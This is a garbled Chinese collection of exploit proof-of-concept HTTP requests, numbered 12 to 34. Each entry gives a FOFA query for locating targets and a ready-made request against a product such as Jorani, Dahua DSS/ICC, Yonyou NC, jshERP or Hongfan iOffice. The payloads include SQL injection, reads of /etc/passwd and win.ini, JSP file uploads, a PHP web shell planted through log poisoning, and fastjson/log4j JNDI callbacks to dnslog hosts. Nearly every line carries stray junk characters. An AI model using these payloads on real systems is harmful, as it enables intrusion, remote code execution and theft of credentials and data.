GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.11 \# d8 y3 ?# P/ X5 v
Host: 127.0.0.1
1 p6 Q/ x9 p& LPragma: no-cache
8 ]# o/ J' Q9 `" [& yCache-Control: no-cache, D4 n2 X2 \- @4 }: }! j) V
Upgrade-Insecure-Requests: 1% n& {/ v+ p# D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" n5 q: b9 p. W9 O2 q6 z/ F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* n1 D0 o! u/ Y5 U1 J% P( KAccept-Encoding: gzip, deflate
. J! q4 D, `6 i& e0 k! BAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
2 e* Y8 B1 |' y2 q: w8 s8 n# YConnection: close
+ U: ]" X1 ]3 X
/ e k0 j* g6 z3 G: c
" L; q: h- @7 ^; L/ W0 [12. Jorani < 1.0.2 远程命令执行
8 u' x3 c- H- x7 E* n+ c, P- `0 LFOFA:title="Jorani"0 H* n- P1 c! ^* _/ f, _
第一步先拿到cookie# f! f* F; |5 H: I1 `. {
GET /session/login HTTP/1.1
& G8 J+ B# Q! F; a) t( u! QHost: 192.168.190.30; {4 {! b" f ]; i& G6 B
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36: Q% q1 `; u7 G! k' g4 y$ _, C
Connection: close
- ?2 @7 y8 u2 G/ m: t* w& LAccept-Encoding: gzip, b% Z g$ g* }5 \1 i
" [. z1 D) h; j/ n) J8 W* ~
3 a7 ]3 \' Y, X7 v0 Y响应中csrf_cookie_jorani用于后续请求
3 x, r8 r$ H, j3 QHTTP/1.1 200 OK
8 P9 h/ L% x4 k9 G ZConnection: close
F# ]# w- v- B1 V! ICache-Control: no-store, no-cache, must-revalidate. [/ h& V6 { G/ B' ?6 M( U% R
Content-Type: text/html; charset=UTF-84 |: Q; e) O: T& L" P
Date: Tue, 24 Oct 2023 09:34:28 GMT! c0 k2 @$ w" m; C
Expires: Thu, 19 Nov 1981 08:52:00 GMT
$ |, f$ X+ ]: U5 k r; ]Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT/ P$ U3 O/ [: ?5 Q ~8 W8 R! m* G
Pragma: no-cache
; a8 V: U" Z7 aServer: Apache/2.4.54 (Debian)! x: n, @4 N' e1 F& a. w! o0 z5 x
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
: q3 T) M8 j- T0 r9 m d& GSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
) M0 R! |& I+ Q# E$ hVary: Accept-Encoding
; q- R/ T9 @1 x* d" K
" V6 X* `8 i: |# Q
G/ J) W5 n# v7 X+ qPOST请求,执行函数并进行base64编码
+ w( P6 G1 @+ j, Y) E4 VPOST /session/login HTTP/1.1
. E, g/ V# f$ u4 Q V& WHost: 192.168.190.30
: X4 G' ~5 e {- B$ D$ S8 u% ^* nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.365 v& D O9 n3 v+ X/ _
Connection: close' }; \, ^5 }5 t" ^' r# I! E* o/ Y
Content-Length: 252
) Q# O. N$ Y) F' @8 IContent-Type: application/x-www-form-urlencoded- v4 |; d. c0 s. p" \) S
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r+ w7 D6 `6 m7 }
Accept-Encoding: gzip
. z% Q8 R# L& @4 U- Y6 t
: E% Q# T4 ?) H4 S. Wcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor: x+ u- O, L f: K$ U/ f6 J2 C
. B2 X/ v# Y1 T
1 L! F3 x5 N* C
1 D, @, z4 f& S/ N
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
9 B% H- a- h, X3 f" g! u3 A" HGET /pages/view/log-2023-10-24 HTTP/1.1
# \/ w- D9 |+ D) d$ R% Q$ ]0 ?Host: 192.168.190.30
& o3 C& |4 q8 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% |7 I8 [6 M l1 _" bConnection: close
' d; v* J( s, e1 d. ICookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r2 E" q8 u8 g# e; X" m% w
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
4 O1 V: s4 }6 _4 l; G5 tX-REQUESTED-WITH: XMLHttpRequest
2 \% E' _8 e2 z6 H) ^( t6 cAccept-Encoding: gzip9 Z3 `3 ?: |* u
; T6 {5 ~' U' h6 b% t% X8 e4 A
1 N0 I. ~! k4 n/ q13. 红帆iOffice ioFileDown任意文件读取
6 ^" R$ I& |( c' Y% PFOFA:app="红帆-ioffice"
. B% A* w D8 g1 J7 Y4 u: ~+ i4 i: y( bGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
* N1 ~7 x/ {8 }7 E1 G" G& LHost: x.x.x.x* k! k* ?; }& h! d( N: r# F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 g# M5 Z6 g/ p c4 l+ }% N1 UConnection: close
+ j5 E- f$ u }! gAccept: */*3 m- b4 _ ]) P! Q% A' v8 e0 Z
Accept-Encoding: gzip
# b& K0 v) W7 R8 Z; N; @0 Y
; d$ O, v% O+ o
9 i" _0 U+ {7 m. w14. 华夏ERP(jshERP)敏感信息泄露
, a$ A& n+ W6 m9 r7 v% TFOFA:body="jshERP-boot"
5 T* j8 X2 B; O0 Q泄露内容包括用户名密码
$ N. w$ A# w% \GET /jshERP-boot/user/getAllList;.ico HTTP/1.11 D) L. h+ N* l) |- E& v0 P# t% s
Host: x.x.x.x5 _ q5 c3 O- F; r- Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
! O9 @$ `7 X3 ?) R+ YConnection: close
( V& X! a% X `. N# R, d. O: p" ]Accept: */*' j* r; `( L2 k) u8 p8 R
Accept-Language: en5 L" q0 h, i* @" m' {
Accept-Encoding: gzip
/ k$ n# x4 u: l+ i9 f" z
" H- h& [& U/ E5 @4 c3 t5 |9 d. N' q4 Z" z8 O+ a0 q) j
15. 华夏ERP getAllList信息泄露
0 D S1 @* F% o) V! v6 l) ICVE-2024-0490. I6 R2 l3 U& V( Y& j% H/ `
FOFA:body="jshERP-boot"
6 t' r+ r+ X# c5 {" S7 S0 [; y泄露内容包括用户名密码$ Y b- E& a# R4 E+ ?
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" `* I* z: n2 z; t
Host: 192.168.40.130:100
9 c! T! g4 k$ b6 q2 j9 x( h6 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
+ i8 i7 M2 ^8 Q' a' s7 dConnection: close; _1 W: F7 Y* [5 V0 S
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.81 z" M8 x2 s& p
Accept-Language: en* N2 P# c) H6 R* r: ]
sec-ch-ua-platform: Windows$ Q- K) _* I6 e3 w7 R2 g6 j% X) l. y
Accept-Encoding: gzip
) A. c+ O+ n, K8 }3 A( X* p: [: H) w' e/ h$ a, o! c& G3 t
0 n4 ^- ?3 Y/ D- D1 `5 c2 I
16. 红帆HFOffice医微云SQL注入
* x1 l7 w6 u N" [FOFA:title="HFOffice") [9 C( [2 F' B) A6 u1 t' ^
poc中调用函数计算1234的md5值7 H# } `- B3 h/ e6 @( v" x
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1/ _. r& J: d: W
Host: x.x.x.x l v! k/ {3 A* n3 ]7 A/ N M
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36& z1 I3 @) L' [# U
Connection: close5 T; A5 {3 ^8 ^- K9 h+ B
Accept: */*5 w( f! C, J! D- C b1 Y
Accept-Language: en
- h6 x! z' O4 u( T' {% kAccept-Encoding: gzip
5 x* W% T" K! o5 Q+ Z. @0 a; U: R, v2 z$ y
* l2 p5 q( M, d$ X* e( {7 v, c# E: R) Y; r17. 大华 DSS itcBulletin SQL 注入4 l1 N( O' R; }
FOFA:app="dahua-DSS"
5 k$ M' s: s/ p5 G; zPOST /portal/services/itcBulletin?wsdl HTTP/1.1" }2 J8 [0 [! q2 P: k& n# B% h) q
Host: x.x.x.x
/ a) e. v9 S# ?- t' {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" q A# C) t% H( ]
Connection: close
$ t$ G4 h6 a- A: W k3 N. L$ YContent-Length: 3457 k9 p8 h/ w$ u1 w1 \
Accept-Encoding: gzip+ e G5 U- S) i/ @' | F$ ~ ?4 \
2 H# d+ g0 I8 O& D' e
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
9 h5 K- O: L0 D X" i<s11:Body>
# q6 v6 v( x& x7 r( b <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
) H0 w( ^ x; @ <netMarkings>+ S/ T8 I& p ?: n7 R) l
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
5 `3 w1 A9 ^: @4 M1 v4 q </netMarkings>. \# r3 z, y3 |5 O' L Q
</ns1:deleteBulletin>
3 p1 N" f& k! G) f" h) ]" X I </s11:Body>9 \* N& Y/ D c
</s11:Envelope>
& D6 n* Z( A; I; O. X8 h
7 |, v% _" ^5 K2 t. S3 f2 ~$ u# E; s7 ?, k& a
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露) |3 y8 s0 V4 N/ \
FOFA:app="dahua-DSS"
P3 {! t" r* m1 I: @4 ~GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
3 x6 ~. H$ P; X3 AHost: your-ip
$ c* Z& i8 y# GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 i+ K' L# u) M y e0 q3 N9 N9 y6 u
Accept-Encoding: gzip, deflate
' j" P* |% ?2 |4 O* u! U* u7 r4 rAccept: */*
5 T( o5 F% @# l% q, a* MConnection: keep-alive
" {% ^& _, x3 h4 ?, T2 @" Q a: {- v9 M5 ~2 L# H& I) ?. d, d( A1 u
$ J- {: s, h+ o) a# I; V
+ v% N* d; Y0 W/ e* N
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
. W" `2 r) B" g" hFOFA:app="dahua-DSS"
* c+ m* k& ?0 \, R$ rGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1( ^, {2 e: Z8 b' [$ t5 c
Host:+ X2 m3 S; |0 F: r( X5 l& u' f8 G
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% ]; v$ _% _. U6 v) w9 h3 yAccept-Encoding: gzip, deflate) o2 E1 i( Q/ u8 b/ B5 [: a! I
Accept: */*
k* N! s$ H& ] _- J1 m; c$ F" q& DConnection: keep-alive2 s& T/ U1 M5 l# D; G
4 Y0 T( r% f& g9 x: K1 \2 ]5 l8 t( m/ R! h
20. 大华ICC智能物联综合管理平台任意文件读取% N" w- S' v; U! G0 k
FOFA:body="*客户端会小于800*"$ k2 h8 B/ R2 L* {% n
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
# Q; X+ }3 t8 ]* B- d0 [3 nHost: x.x.x.x
" r& S& S' D9 L* S& T+ n$ CUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 V6 `3 x' X: H2 M+ ~+ t+ YConnection: close
7 r% j F- W: LAccept: */*; A$ r$ z1 v) u. c- b# D) e
Accept-Language: en) A0 X. @3 p2 p$ W" h8 j
Accept-Encoding: gzip2 a, k+ ^4 N$ O o) l3 N+ y! G# X
1 q2 C8 V) n$ P5 e. T' \- P
& P+ e' G1 E+ ]
21. 大华ICC智能物联综合管理平台random远程代码执行 Q" A8 N- I6 L& U1 l
FOFA:icon_hash="-1935899595"' l( [2 X' Z. p/ U
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.12 a& b; T) {6 B$ P' A( S2 z
Host: x.x.x.x
2 |9 l! R" K. [! Q1 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ ~5 K8 p$ b9 t8 }& e
Content-Length: 161+ O2 m4 P# S5 I9 s
Accept-Encoding: gzip4 Y( l, j& ?5 F6 I" q) p2 u7 S
Connection: close
: f/ l. G1 q9 `: nContent-Type: application/json;charset=utf-8
6 a6 t# v' T: ~8 p4 A q7 g+ E- x7 e6 g9 r$ I
{! d3 e E) W) k9 E
"a":{
, i7 i8 z# M! f1 S' h! {+ l "@type":"com.alibaba.fastjson.JSONObject",
$ l- n$ f( Q* `4 g5 K* d' L& y {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}+ b7 c2 D) e$ k5 |7 h3 z4 |
}""3 i" A1 V3 X% {4 b: F1 ^
}
* O5 p6 e: V1 N) V6 n" r9 e& X O1 h) b/ W+ n) m7 A
! o7 J! C" I& g1 d. P: s0 T0 b22. 大华ICC智能物联综合管理平台 log4j远程代码执行
3 X+ ^5 x8 Z8 b* }7 W6 u, NFOFA:icon_hash="-1935899595", {! @, ~4 c' A* a: L! j
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1& Z, k4 i* _ ]/ V4 v B9 H
Host: your-ip0 [3 w- D' h" h" Z4 h0 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. m& \* f* z5 _* V$ M6 } AContent-Type: application/json;charset=utf-8
7 L6 I; ^% r; L7 c* Q( w7 F4 f" K% t/ H3 w* l
{
0 B4 N* w8 Y& r W"loginName":"${jndi:ldap://dnslog}"
; R" A2 g5 _8 k4 K2 w3 l2 _}: j( [$ l4 ]( a( ?
4 b. a' @9 g3 b" o o9 R) D
5 l" @; m2 E; F* m
3 q- T7 f9 p& p
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
2 }& j2 b6 c; y* H, ~2 [% VFOFA:icon_hash="-1935899595"2 h' k$ R( E) l3 L
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1; z( N1 _/ m; ?7 S
Host: your-ip" [' [ u. z% \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 s f* ^ D( z2 r. [8 Z% s7 D! d
Content-Type: application/json;charset=utf-8
g6 W, q. ]% F2 A; L. ?* x4 QAccept-Encoding: gzip
# J$ p! [* u+ j8 z7 AConnection: close
) k: n) ?. F5 ^, F1 {1 [( t* n* R8 T3 h
{2 h6 D+ H8 q4 s' P
"a":{
3 t3 \ @! R1 b: T7 @ "@type":"com.alibaba.fastjson.JSONObject"," e2 i4 O1 J, _7 `4 s
{"@type":"java.net.URL","val":"http://DNSLOG"}9 x- S" F/ J! ?- B6 H' ~! J% {# z
}""
/ K' P7 g4 ^ n2 k% A3 W& i3 q}
8 E3 ^8 K, m% j6 v$ t0 T3 d0 v- W$ k0 U f0 M5 @
7 y8 q$ a% ]7 Q, b
24. 用友NC 6.5 accept.jsp任意文件上传) S D. G& e6 N5 N
FOFA:icon_hash="1085941792"
6 l# v6 ~' ?* A! r' w: E- jPOST /aim/equipmap/accept.jsp HTTP/1.1; S; ?2 H7 d ]# y$ u" i, N
Host: x.x.x.x
0 W1 F; b. P6 R8 R$ i+ h5 E: |User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
) L4 K0 ]: {0 R; ~/ JConnection: close" \4 J9 |3 n' S0 F; `9 Z/ U8 O1 f# Z
Content-Length: 449
2 V* D, x8 [/ A1 sAccept: */*
* n5 x9 L+ f9 y7 [4 l! H2 jAccept-Encoding: gzip
- W2 u- d" g3 v. z/ X9 q- w3 fContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc0 J2 Y1 a8 U/ t, c
- B0 N0 p- I0 s-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc. G, s0 S* x3 [2 u9 p* Q4 C7 s3 c
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"1 O$ z$ \1 a3 V: B
Content-Type: text/plain2 J* X; ~( I+ a1 v# r2 b# j5 ~& f
% ]7 x( `" B' A( Q/ `
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
, A' d( Z+ h" z) |9 C. ?-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 e1 N. t! ^% U" H" l
Content-Disposition: form-data; name="fname"& R& ]; i+ C: G0 k% ?+ ^% w$ V5 C
' W8 b. O \/ _' n7 ?/ A6 a; Z) o\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
+ u4 y/ d' L. c; p/ h3 t-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
$ w' j- H ]/ q/ k- k8 ~4 S% c2 z' x
5 p: @1 g6 F! ^; Y$ d$ u25. 用友NC registerServlet JNDI 远程代码执行+ ~2 i( \5 M# Z2 \/ t( j
FOFA:app="用友-UFIDA-NC"
4 @4 Q+ @! y( S4 X7 a3 A+ IPOST /portal/registerServlet HTTP/1.1
3 {: v) |% ]' J( H k) DHost: your-ip
2 _* @" K; h& R0 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
" K! U2 Z8 ?7 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
- S& H9 Q2 ~# E1 p7 ?% x% dAccept-Encoding: gzip, deflate; Q( G& A' |! O* }
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6/ G) U& D% V8 Y" `6 |8 z
Content-Type: application/x-www-form-urlencoded
7 z" p+ L4 B& B7 s( r3 ^* G0 I# F+ m- e# A9 B1 C
type=1&dsname=ldap://dnslog9 y4 y# j6 u$ ~4 Q# S2 n% g) |
2 i8 @4 k7 l; m1 _/ r5 E( M: _& d
+ @: o7 K8 u. s$ `7 F& c5 Y, n
4 k# n8 N0 J6 Z+ D26. 用友NC linkVoucher SQL注入
& y. u! w8 E; t5 R) BFOFA:app="用友-UFIDA-NC"
3 w, }, e9 `- l/ Q. U5 fGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
4 }" D4 K3 C; N2 h6 ]Host: your-ip% b, X) `# |$ Z0 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. q. c& f$ X9 u9 E
Content-Type: application/x-www-form-urlencoded
$ I$ s" B, ?$ N/ VAccept-Encoding: gzip, deflate
. c& U, j% q% ?# NAccept: */*
2 q( P9 `* \) ?- U$ Y4 ~5 AConnection: keep-alive! I6 m; k; }# R% p
: C! s) [ P* {) q% D7 E5 j, Q5 ~# P, m8 m* u& m
27. 用友 NC showcontent SQL注入- w+ ~2 F' r; u4 a" |2 ^
FOFA:icon_hash="1085941792"
/ a3 \$ M/ g* H: a9 U$ K1 Z: ZGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1! Y, L0 z& J4 U7 V
Host: your-ip5 l! y1 }- ^7 T+ x/ S- f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) l) }9 V7 Q; U( A0 o
Accept-Encoding: identity
& y% u' T, O$ M! u$ U. v4 \Connection: close
4 [8 ?- i/ n0 A; `: CContent-Type: text/xml; charset=utf-8
- |: d. E( h' N8 l( V5 P7 I% R* S- U: g e7 M; w2 s
6 l1 Z- b$ W4 S$ q- Q8 x% n8 R
28. 用友NC grouptemplet 任意文件上传
2 `; N/ B* o0 y/ XFOFA:icon_hash="1085941792"9 q) W; e4 O7 I( i( H: k
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1: [+ m5 i* E6 j( V& N- [: A/ u
Host: x.x.x.x+ u# A! Z- t+ S0 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36, ^+ M1 V0 h) b( F! m$ y2 f
Connection: close) X( y; ~) |2 O
Content-Length: 268
/ L) o: f3 ?0 [0 ?Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, I ? ]7 S" h
Accept-Encoding: gzip
4 P3 B6 \1 h6 f! r5 G/ Z/ @( l
! f: E E) k1 \6 T7 {------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
3 q$ o' R6 L: b u, |! T& RContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
, v+ ^5 m- O" tContent-Type: application/octet-stream
( N1 }" T# }6 Q# g8 P3 k1 H( t0 x# w: I
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>/ T; M" m; A$ Z4 t
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--6 i" ^0 ~9 ^8 X* `; w3 }
' ]8 z3 b4 ?; L- ?6 A( E2 ^5 k
7 B. B6 I) e4 r% y. w/ m% J9 M/uapim/static/pages/nc/head.jsp+ O2 q# m( d+ q! Z) k4 s
- _/ v& l% r; u% o2 q) c29. 用友NC down/bill SQL注入
6 s( f. \9 {& c7 SFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"* _3 }3 U+ o* ~" V3 U! J: k9 T/ E
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. x5 l1 o# U, b! IHost: your-ip4 v0 }, l! `2 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 P" L3 C5 |- `; y9 hContent-Type: application/x-www-form-urlencoded. Z. t' J4 g% E& _* i
Accept-Encoding: gzip, deflate
) Q7 a: F- }$ y! KAccept: */*
0 ]+ \! w7 s3 ? oConnection: keep-alive
9 P0 \/ N' U4 x" e$ t: G& B
( i L; `' a: _0 _- ]1 R( R7 l, E6 U6 Q5 G Q
30. 用友NC importPml SQL注入5 ^ P' g" C9 J4 V& f1 m w5 {
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
& [& H" o0 i/ F- y/ I+ |7 \) ?1 f6 T2 ePOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1) W4 [; ]$ G! \$ E- T8 p
Host: your-ip) T' I6 F+ {0 f9 |3 n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
8 \6 t Q1 V) ^. i/ n( `% zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" K- ?4 J# q' n
Connection: close
9 k5 B j) y+ @, H7 V K0 B
) _# u8 P% H+ r------WebKitFormBoundaryH970hbttBhoCyj9V
5 ^ l6 C0 V) n" T3 r; vContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
0 E! U8 r. X+ O6 oContent-Type: image/jpeg1 T& B+ E1 M8 v8 a. ? D. o
------WebKitFormBoundaryH970hbttBhoCyj9V--: B5 W' E0 G7 q+ h; L6 }) |
- k) ~7 \$ J- U& }2 X9 a
" x0 t* K9 _+ N0 Y" V31. 用友NC runStateServlet SQL注入. r- X: _* v" t, D8 _
version<=6.5
2 n; F7 X$ t& H+ jFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
& ?1 Q/ ?& q/ m( [: x+ y9 HGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 H5 A2 t0 F" ~. N& K) ^* @Host: host
% T+ z, O/ ]$ x; |6 C; {& G+ p/ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; x) v, a# U0 M6 _( VContent-Type: application/x-www-form-urlencoded- N$ ^7 X9 z! Y F/ e- {1 U
8 _; x9 ]# W1 b' x
% \7 e& D* o% a3 E
32. 用友NC complainbilldetail SQL注入
( _% C" Q6 w( W$ @ I1 |- gversion= NC633、NC65, c, n$ x( Q9 Z2 @) A& p
FOFA:app="用友-UFIDA-NC"" F$ l: z& c/ I. k
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.11 }. r: y/ s0 z/ x% u
Host: your-ip
; F k. A5 _7 Z+ V TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ m" ^3 w& [3 G1 s, b: ~/ }9 M
Content-Type: application/x-www-form-urlencoded
- M( a0 d9 m& w- TAccept-Encoding: gzip, deflate
8 V% F1 B3 ~; ?8 @# `* q3 SAccept: */*+ y7 Q) F( r/ X. h
Connection: keep-alive" T; z1 O6 Q* k2 s' }) J
' m9 R2 d$ e# }: F) X1 K5 U
- N8 H& r5 W3 j0 f) k+ u( E33. 用友NC downTax/download SQL注入
" D- I9 H8 R2 m2 Kversion:NC6.5FOFA:app="用友-UFIDA-NC"" ? r7 h% B0 k
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ O2 G# Q! \) nHost: your-ip
& P6 Z5 o3 C* k0 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& w `- E; E, x2 j: Y7 f/ BContent-Type: application/x-www-form-urlencoded$ P2 {+ s7 N0 J2 S
Accept-Encoding: gzip, deflate
# U u/ z" s' X9 h! ZAccept: */*
3 i: z9 y( u$ z7 [Connection: keep-alive
0 O: W j4 L/ O6 D+ o" P. n; o+ C0 C$ I/ ~9 g# W
6 H- U7 j8 t i, |34. 用友NC warningDetailInfo接口SQL注入5 x; x" y Y) G; N5 J7 @
FOFA:app="用友-UFIDA-NC"
' Z! I/ I0 w$ i4 i0 V8 C$ ~GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 L7 @3 \, `$ W$ A8 F6 y( eHost: your-ip5 P+ v3 Z+ }. r$ V9 ~ X: p& i( @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 k2 H8 E1 p/ S) C4 M3 u. p* _
Content-Type: application/x-www-form-urlencoded
* P4 m& z% S1 y% c: MAccept-Encoding: gzip, deflate
; A& m/ v% f* h8 `9 dAccept: */*
" u1 Y. x: ^% G) Z: j0 U5 WConnection: keep-alive
0 X7 L2 X* ~+ T; ^5 J" i) `- u' \& U5 l, B/ H
1 g: x) u& i- l& F% W$ q/ ^
